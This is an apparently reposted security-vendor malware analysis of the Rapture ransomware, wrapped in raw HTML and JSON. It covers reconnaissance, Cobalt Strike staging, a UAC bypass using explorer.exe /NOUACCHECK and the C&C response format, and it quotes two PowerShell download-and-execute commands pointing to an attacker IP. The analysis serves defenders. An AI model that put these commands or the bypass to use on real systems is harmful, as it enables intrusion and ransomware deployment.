Rapture, a Ransomware Family With Similarities to Paradise<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise.html\"><br \/>\n<meta property=\"og:title\" content=\"Rapture, a Ransomware Family With Similarities to Paradise\"><br \/>\n<meta property=\"og:description\" content=\"In March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/rapture-641.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Rapture, a Ransomware Family With Similarities to Paradise\"><br \/>\n<meta name=\"twitter:description\" content=\"In March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/rapture-641.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.420834900338\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"128584148\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.8148148148148\">\n<div class=\"article-details\" role=\"heading\" readability=\"39.259259259259\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Ransomware<\/p>\n<p class=\"article-details__description\">In March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.<\/p>\n<p class=\"article-details__author-by\">By: Don Ovid Ladores, Ian Kenefick, Earle Maui Earnshaw <time class=\"article-details__date\">April 28, 2023<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"41.831589958159\">\n<div readability=\"30.772663877266\">\n<p>In March and April 2023, we observed a type of <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/definition\/Ransomware\">ransomware<\/a> targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack.<\/p>\n<p>The memory dump during the ransomware\u2019s execution reveals an RSA key configuration file similar to that used by the <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/news\/cybercrime-and-digital-threats\/new-variant-of-paradise-ransomware-spreads-through-iqy-files\">Paradise ransomware<\/a>. To make analysis more difficult, the attackers packed the Rapture ransomware <a href=\"https:\/\/www.oreans.com\/Themida.php\">using Themida<\/a>, a commercial packer. Rapture requires at least a .NET 4.0 framework for proper execution; this suggests more similarities with Paradise, which has been known to be compiled as a .NET executable. For this reason, we dubbed this ransomware type as Rapture, a closely related nomenclature to Paradise.<\/p>\n<p>It is important to note that although it shares certain similarities with Paradise, Rapture\u2019s behavior is different from the former.<\/p>\n<p>In April, we found a couple of ransomware activities that appear to be injected in legitimate processes. By tracing these activities back to the source process, we found that the ransomware appeared as an activity loaded into memory from a <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/tracking_cobalt_strike_a_vision_one_investigation.html\">Cobalt Strike<\/a> beacon. In some instances, the attackers dropped the ransomware in a folder or drive as a <i>*.log<\/i> file:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"> <i>E:\\ITS.log<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"> <i>C:\\[Redacted]\\Aps.log<\/i><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"d2672c\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-1.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-1.png\" alt=\"Figure 1. The ransomware file packed using Themida\"> <\/a><figcaption>Figure 1. The ransomware file packed using Themida<\/figcaption><\/figure>\n<\/p><\/div>\n<div readability=\"5.8533161773307\">\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>The Rapture ransomware drops its notes to every traversed directory (the first six characters might appear to random, but they are actually hard-coded string configurations).<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>7qzxid-README.txt<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>qiSgqu-README.txt<\/i><\/span><\/li>\n<\/ul>\n<p>It then appends the same six characters to the following encrypted files:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>*.7qzxid<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>*.qiSgqu<\/i><\/span><\/li>\n<\/ul>\n<p>Rapture requires certain command lines (shown in Figure 2) to execute properly. Once the correct argument is passed to the malicious file, it will start the ransomware routine as also displayed in its console window.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"b17480\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-2.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-2.png\" alt=\"Figure 2. Execution of the Rapture ransomware using the correct command-line arguments (top) and the console window during ransomware execution (bottom)\"> <\/a> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"5d7b68\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-2b.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-2b.png\" alt=\"Figure 2. Execution of the Rapture ransomware using the correct command-line arguments (top) and the console window during ransomware execution (bottom)\"> <\/a><figcaption>Figure 2. Execution of the Rapture ransomware using the correct command-line arguments (top) and the console window during ransomware execution (bottom)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"30.594752186589\">\n<div readability=\"10.198250728863\">\n<p>The dropped ransom note bears some resemblance to the <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/security\/news\/cybercrime-and-digital-threats\/ransomware-recap-snatch-and-zeppelin-ransomware\">Zeppelin ransomware<\/a> (although we believe this is the only connection between the two). We tried to gleam additional information from the ransom note and discovered that the Rapture ransomware has been <a href=\"https:\/\/bbs.360.cn\/thread-16071225-1-1.html\">around<\/a> for a while now, but there were no samples available during its initial sighting.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"1e45d5\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-3.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-3.png\" alt=\"Figure 3. The dropped ransom note\"> <\/a><figcaption>Figure 3. The dropped ransom note<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.541666666667\">\n<div readability=\"10.847222222222\">\n<p>During our investigation, we discovered that the whole infection chain spans three to five days at most (counting from the time of discovery of the reconnaissance commands). Rapture\u2019s operators first perform the following, likely to guarantee a more successful attack:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Inspect firewall policies<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Check the PowerShell version<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Check for vulnerable <a href=\"https:\/\/www.trendmicro.com\/en_us\/apache-log4j-vulnerability.html\">Log4J<\/a> applets<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"0ea720\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-4.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-4.png\" alt=\"Figure 4. One of the PowerShell command lines found during the reconnaissance stage\"> <\/a><figcaption>Figure 4. One of the PowerShell command lines found during the reconnaissance stage<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.5\">\n<div readability=\"28\">\n<p>After a successful reconnaissance routine, the attackers proceed with the first stage of the attack by downloading and executing a PowerShell script to install Cobalt Strike in the target\u2019s system.<\/p>\n<p>After the reconnaissance stage, the attackers will try to gain access to the victim\u2019s network (likely through vulnerable public-facing websites and servers since their initial entry is via <i>w3wp.exe<\/i> for PowerShell execution).<\/p>\n<p>The following command is used for the first execution instance of PowerShell through <i>w3wp.exe<\/i>:<\/p>\n<p><i><span class=\"blockquote\">\/c powershell set-alias -name aspersky -value Invoke-Expression;aspersky(New-Object Net.WebClient).DownloadString(\u2018[hxxp]:\/\/195.123.234[.]101:80\/Sharepoint\/Pickers.aspx\u2019)<\/span><\/i><\/p>\n<p>Meanwhile, the second execution instance, this time from Windows Management Instrumentation (WMI), is done via the following command:<\/p>\n<p><i><span class=\"blockquote\">\/c powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString(‘[hxxp]:\/\/195.123.234[.]101:80\/Microsoft\/Online’)<\/span><\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"679d1f\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-5.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-5.png\" alt=\"Figure 5. PowerShell of the first-stage downloader \"> <\/a><figcaption>Figure 5. PowerShell of the first-stage downloader <\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"38.395338983051\">\n<div readability=\"23.328813559322\">\n<p>The attacks use a unique method of obtaining higher privileges to execute the payload. By default, there is a task in newer versions of Windows called <i><a href=\"https:\/\/devblogs.microsoft.com\/oldnewthing\/20220524-00\/?p=106682\">CreateExplorerShellUnelevatedTask<\/a><\/i> that prevents <i>explorer.exe<\/i> from running with elevated privileges. However, if <i>explorer.exe<\/i> is launched using the command line <i>\/NOUACCHECK<\/i>, it inherits the elevated status from the parent process. In this case, the malicious actors injected the malicious activity into an existing <i>svchost.exe<\/i>, which serves as the parent process. The <i>svchost.exe<\/i> process then executes <i>explorer.exe<\/i> using the <i>\/NOUACCHECK<\/i> command. Once this is done, <i>explorer.exe<\/i> can then be used to drop and execute the second stage Cobalt Strike beacon downloader.<\/p>\n<p>The second-stage downloader will then connect to the following address to download the main Cobalt Strike beacon: <i>195.123.234[.]101\/DoFor\/review\/Mcirosoft<\/i><\/p>\n<p>The data response from the command-and-control (C&C) server contains the encrypted beacon sandwiched in the middle of a JavaScript file (with the script code bearing no actual usage or significance for the malware chain). The downloader decrypts the sandwiched code and then executes the Cobalt Strike beacon.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"cdaa0b\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-6.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-6.png\" alt=\"Figure 6. The Cobalt Strike downloader C&C server response containing the encrypted beacon\"> <\/a><figcaption>Figure 6. The Cobalt Strike downloader C&C server response containing the encrypted beacon<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>The second (main) stage beacon will attempt to connect to another subfolder in the same C&C server, where it will attempt to receive the backdoor command and other payloads. Similarly, the response of the C&C server is also sandwiched in another JavaScript code that will be decoded by the following beacon: <i>195.123.234[.]101\/Make\/v8.01\/Sharepoint<\/i><\/p>\n<p>Based on our analysis of the decrypted C&C response from the beacon, we have deduced that the decoded content will have the following structure (after the beacon removes the garbage padding):<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"1\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody readability=\"5\">\n<tr>\n<td height=\"42\" width=\"248\"><b>Offset<\/b><\/td>\n<td width=\"248\"><b>Length<\/b><\/td>\n<td width=\"248\"><b>Data<\/b><\/td>\n<td width=\"248\"><b>Description<\/b><\/td>\n<\/tr>\n<tr>\n<td height=\"48\" width=\"248\">0x00<\/td>\n<td width=\"248\">0x04<\/td>\n<td width=\"248\">N\/A<\/td>\n<td width=\"248\">Four-byte header<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"68\" width=\"248\">0x04<\/td>\n<td width=\"248\">0x04<\/td>\n<td width=\"248\">0x04000000<\/td>\n<td width=\"248\">Flag (big endian will convert to little endian after decryption)<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"71\" width=\"248\">0x08<\/td>\n<td width=\"248\">0x04<\/td>\n<td width=\"248\">0xnn000000<\/td>\n<td width=\"248\">Backdoor command (big endian will convert to little endian after decryption)<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"78\" width=\"248\">0x0c<\/td>\n<td width=\"248\">0x04<\/td>\n<td width=\"248\">N\/A<\/td>\n<td width=\"248\">Data size, length of additional data from the response; big endian will convert to little endian after decryption<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"71\" width=\"248\">0x10<\/td>\n<td width=\"248\">Depends on [0x0c]<\/td>\n<td width=\"248\">N\/A<\/td>\n<td width=\"248\">Additional data to be supplied to some of the backdoor commands<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<p><h5>Table 1. The structure of the decrypted C&C server response from the beacon communication<\/h5>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>We found that the beacon performed ransomware activities in majority of the affected systems, which implies that the code is downloaded and executed in memory except for a few machines where we found the actual ransomware.<\/p>\n<p>We tried to gather more information about the Cobalt Strike beacon via its watermark, where we discovered that the same watermark is also used by other threat actors. This indicates that it is likely that Rapture\u2019s operators are using a pirated Windows license which is also being used by several others. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"ce8f5b\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-7.png\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/rapture-7.png\" alt=\"Figure 7. The particular Cobalt Strike watermark as seen in relation to different groups\"> <\/a><figcaption>Figure 7. The particular Cobalt Strike watermark as seen in relation to different groups<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"44.246015936255\">\n<div readability=\"36.158034528552\">\n<p>The Rapture ransomware is cleverly designed and bears some similarities to other ransomware families such as Paradise. Although its operators use tools and resources that are readily available, they have managed to use them in a way that enhances Rapture\u2019s capabilities by making it stealthier and more difficult to analyze. As is the case with many modern families, these types of fairly sophisticated ransomware are beginning to become the norm in many present-day campaigns. <\/p>\n<p>To protect their systems from ransomware attacks, organizations can implement security frameworks that systematically allocate resources to establish a robust defense strategy. Here are some recommended guidelines for organizations consider:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Conduct an inventory of assets and data.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Identify authorized and unauthorized devices and software.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Audit event and incident logs<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Manage hardware and software configurations.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Grant admin privileges and access only when necessary for an employee’s role.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Monitor network ports, protocols, and services.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Establish a software allowlist that only allows legitimate applications to execute.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Implement data protection, backup, and recovery measures.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enable multifactor authentication (MFA).<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Watch for early signs of an attack, such as the presence of suspicious tools in the system.<\/span><\/li>\n<\/ul>\n<p>Organizations can adopt a multifaceted approach to secure potential entry points into their systems, such as endpoints, emails, webs, and networks. By using security solutions that can detect malicious elements and questionable activities, enterprises can protect themselves from ransomware attacks.<\/p>\n<p>A multilayered approach can help organizations guard possible entry points into their system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior, which can help protect enterprises. <\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\">Trend Micro Vision One\u2122<\/a>\u202fprovides multilayered protection and behavior detection, which helps block questionable behavior and tools before the ransomware can do any damage. <\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-workload-security.html\">Trend Micro Cloud One\u2122 \u2013 Workload Security<\/a>\u202fprotects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.\u202f <\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/email-and-collaboration\/email-inspector.html\">Trend Micro\u2122 Deep Discovery\u2122 Email Inspector<\/a>\u202femploys custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware. <\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\">Trend Micro Apex One\u2122<\/a>\u202foffers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints. <br \/> <\/span><\/li>\n<\/ul>\n<p><b><span class=\"body-subhead-title\">Indicators of Compromise (IOCs)<\/span><\/b><\/p>\n<p>The indicators of compromise for this entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise\/iocs-rapture-a-ransomware-family-with-similarities-to-paradise.txt\">here<\/a>.<\/p>\n<p><b> <\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>   <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/d\/rapture-a-ransomware-family-with-similarities-to-paradise.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In March and April 2023, we observed a type of ransomware targeting its victims via a minimalistic approach with tools that leave only a minimal footprint behind. Our findings revealed many of the preparations made by the perpetrators and how quickly they managed to carry out the ransomware attack. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":51672,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9539,9509],"class_list":["post-51671","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-ransomware","tag-trend-micro-research-research"],"yoast_head":"\n<title>Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/rapture-a-ransomware-family-with-similarities-to-paradise\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-04-28T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/rapture-641.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Rapture, a Ransomware Family With Similarities to Paradise\",\"datePublished\":\"2023-04-28T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\"},\"wordCount\":1579,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/rapture-a-ransomware-family-with-similarities-to-paradise.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Ransomware\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\",\"name\":\"Rapture, a Ransomware Family With Similarities to Paradise 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/rapture-a-ransomware-family-with-similarities-to-paradise.png\",\"datePublished\":\"2023-04-28T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/rapture-a-ransomware-family-with-similarities-to-paradise.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/rapture-a-ransomware-family-with-similarities-to-paradise.png\",\"width\":974,\"height\":510},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/rapture-a-ransomware-family-with-similarities-to-paradise\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Rapture, a Ransomware Family With Similarities to Paradise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC 